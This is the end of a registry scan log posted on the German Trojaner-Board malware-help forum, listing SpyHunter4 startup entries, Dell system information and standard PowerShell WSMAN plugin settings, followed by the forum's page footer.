"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"

Searching for "        "
[HKEY_LOCAL_MACHINE\SOFTWARE\Dell Computer Corporation\SysInfo]
"System Manufacturer"="Dell Inc.        "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML"="            <PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" >                <InitializationParameters>                    <Param Name="PSVersion" Value="2.0"/>                </InitializationParameters>                <Resources>                    <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" SupportsOptions="true" ExactMatch="true">                        <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                        <Capability Type="Shell"/>                    </Resource>                </Res
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell32]
"ConfigXML"="<PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell32" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" Architecture="32" >                        <InitializationParameters>                            <Param Name="PSVersion" Value="2.0"/>                        </InitializationParameters>                        <Resources>                            <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" SupportsOptions="true" ExactMatch="true">                                <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                               
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Live\Common]
"Manufacturer"="Dell Inc.        "

-= EOF =-


Alle Zeitangaben in WEZ +1. Es ist jetzt 11:37 Uhr.
Seite 2 von 5 1 2 34 Letzte »
100 Beiträge dieses Themas auf einer Seite anzeigen

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19